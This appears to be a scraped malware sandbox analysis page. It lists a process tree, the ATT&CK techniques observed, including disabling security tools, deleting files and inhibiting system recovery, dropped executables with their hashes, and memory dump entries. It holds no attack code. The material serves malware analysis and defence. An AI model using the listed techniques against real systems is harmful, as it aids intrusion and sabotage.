C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:2636

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:4004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Disabling Security Tools

1

T1089

File Deletion

3

T1107

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Peripheral Device Discovery

1

T1120

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

3

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e7aa0daa42cf46f9268775f5deff2b2f9574ef893202491521e89a7540688152.exe.log
MD5
41fbed686f5700fc29aaccf83e8ba7fd

SHA1
5271bc29538f11e42a3b600c8dc727186e912456

SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

Download Submit
C:\Windows\Tasks\SA.abf
MD5
3ecdeace2a9e31dd8174853dec020926

SHA1
b83182c1cc6555bccbe675893c91f5e011eb417d

SHA256
54ce79542872a4f491f70eb56314f6e49282ede13e7d55662ef06c296d54aa54

SHA512
c27f4fa8f6ef437a11ae361478249ab4ac601e45404cf3d8ddd613391a0711ab256ac5712ed31dbe905a6d5764054a01902303d944336b6d5f992a67fb919421

Download Submit
C:\Windows\Tasks\condition.exe
MD5
77641a8ced792a27d6e11d69d068ce17

SHA1
39153e51fd474b299087f4adba901a0cc064eb11

SHA256
bdf924721a28595ab2d233ffbca8cea121194642786a76bfe1cd58f3721ed3b7

SHA512
83933db29bb384fd843ae0a25728c17180722c835e9f023dc4a4d7aac2c876851aa098aeb9893561bffd06682814fb1ca0b5359af7e46b19946e2ecfb38a6b2c

Download Submit
C:\Windows\Tasks\condition.exe
MD5
77641a8ced792a27d6e11d69d068ce17

SHA1
39153e51fd474b299087f4adba901a0cc064eb11

SHA256
bdf924721a28595ab2d233ffbca8cea121194642786a76bfe1cd58f3721ed3b7

SHA512
83933db29bb384fd843ae0a25728c17180722c835e9f023dc4a4d7aac2c876851aa098aeb9893561bffd06682814fb1ca0b5359af7e46b19946e2ecfb38a6b2c

Download Submit
C:\Windows\Tasks\wmi.exe
MD5
b114584d7fb38dae39cb48f466248961

SHA1
79baf946da58c3aadc0781eb7dd808b22100e44b

SHA256
414e6e1fd3889db48779b4452e28dca9371a552356f6a658b7b1ce005d3b1c27

SHA512
63fb0094f062e08926a1d0716e13a4e67eab50f0b115c92b8d9d182a56b5c0500c227887dde3075e11476229ff74db16c2aaf95bc36f4093834409cbe06fe2ee

Download Submit
C:\Windows\Tasks\wmi.exe
MD5
b114584d7fb38dae39cb48f466248961

SHA1
79baf946da58c3aadc0781eb7dd808b22100e44b

SHA256
414e6e1fd3889db48779b4452e28dca9371a552356f6a658b7b1ce005d3b1c27

SHA512
63fb0094f062e08926a1d0716e13a4e67eab50f0b115c92b8d9d182a56b5c0500c227887dde3075e11476229ff74db16c2aaf95bc36f4093834409cbe06fe2ee

Download Submit
C:\Windows\Tasks\wmi.exe
MD5
b114584d7fb38dae39cb48f466248961

SHA1
79baf946da58c3aadc0781eb7dd808b22100e44b

SHA256
414e6e1fd3889db48779b4452e28dca9371a552356f6a658b7b1ce005d3b1c27

SHA512
63fb0094f062e08926a1d0716e13a4e67eab50f0b115c92b8d9d182a56b5c0500c227887dde3075e11476229ff74db16c2aaf95bc36f4093834409cbe06fe2ee

Download Submit
memory/64-398-0x0000000000000000-mapping.dmp

Download
memory/64-418-0x00000000050E0000-0x0000000005708000-memory.dmp

Filesize
6.2MB

Download
memory/604-141-0x0000000000000000-mapping.dmp

Download
memory/668-426-0x0000000000000000-mapping.dmp

Download
memory/712-143-0x0000000000000000-mapping.dmp

Download
memory/892-132-0x00000000056E0000-0x00000000056E1000-memory.dmp

Filesize
4KB

Download
memory/892-127-0x0000000005BE0000-0x0000000005BE1000-memory.dmp

Filesize
4KB

Download
memory/892-130-0x00000000056A0000-0x00000000056A1000-memory.dmp

Filesize
4KB

Download
memory/892-135-0x00000000061F0000-0x00000000061F1000-memory.dmp

Filesize
4KB

Download
memory/892-137-0x0000000006660000-0x0000000006661000-memory.dmp

Filesize
4KB

Download
memory/892-138-0x0000000007200000-0x0000000007201000-memory.dmp

Filesize
4KB

Download
memory/892-139-0x0000000008000000-0x0000000008001000-memory.dmp

Filesize
4KB

Download
memory/892-140-0x00000000073D0000-0x00000000073D1000-memory.dmp

Filesize
4KB

Download
memory/892-129-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/892-122-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/892-128-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/892-123-0x0000000000419322-mapping.dmp

Download
memory/892-131-0x00000000055D0000-0x0000000005BD6000-memory.dmp

Filesize
6.0MB

Download
memory/1052-142-0x0000000000000000-mapping.dmp

Download
memory/1116-425-0x0000000000000000-mapping.dmp

Download
memory/1256-144-0x0000000000000000-mapping.dmp

Download
memory/1952-427-0x0000000000000000-mapping.dmp

Download
memory/2024-420-0x0000000000000000-mapping.dmp

Download
memory/2616-424-0x0000000000000000-mapping.dmp

Download
memory/2808-397-0x0000000000000000-mapping.dmp

Download
memory/3052-115-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

Filesize
4KB

Download
memory/3052-117-0x0000000005360000-0x0000000005361000-memory.dmp

Filesize
4KB

Download
memory/3052-118-0x0000000005340000-0x0000000005341000-memory.dmp

Filesize
4KB

Download
memory/3052-119-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/3052-120-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

Filesize
4KB

Download
memory/3052-121-0x0000000005C10000-0x0000000005C11000-memory.dmp

Filesize
4KB

Download
memory/3664-419-0x0000000000000000-mapping.dmp

Download
memory/4060-151-0x0000000008090000-0x0000000008091000-memory.dmp

Filesize
4KB

Download
memory/4060-148-0x0000000004F00000-0x0000000004F01000-memory.dmp

Filesize
4KB

Download
memory/4060-222-0x000000007E670000-0x000000007E671000-memory.dmp

Filesize
4KB

Download
memory/4060-181-0x0000000009E20000-0x0000000009E21000-memory.dmp

Filesize
4KB

Download
memory/4060-153-0x00000000083E0000-0x00000000083E1000-memory.dmp

Filesize
4KB

Download
memory/4060-154-0x0000000008230000-0x0000000008231000-memory.dmp

Filesize
4KB

Download
memory/4060-150-0x0000000007860000-0x0000000007861000-memory.dmp

Filesize
4KB

Download
memory/4060-149-0x00000000079F0000-0x00000000079F1000-memory.dmp

Filesize
4KB

Download
memory/4060-180-0x0000000009C00000-0x0000000009C01000-memory.dmp

Filesize
4KB

Download
memory/4060-224-0x0000000004F83000-0x0000000004F84000-memory.dmp

Filesize
4KB

Download
memory/4060-147-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/4060-146-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/4060-145-0x0000000000000000-mapping.dmp

Download
memory/4060-175-0x0000000009AB0000-0x0000000009AB1000-memory.dmp

Filesize
4KB

Download
memory/4060-168-0x0000000009AD0000-0x0000000009B03000-memory.dmp

Filesize
204KB

Download
memory/4060-159-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/4060-156-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/4060-157-0x0000000004F82000-0x0000000004F83000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads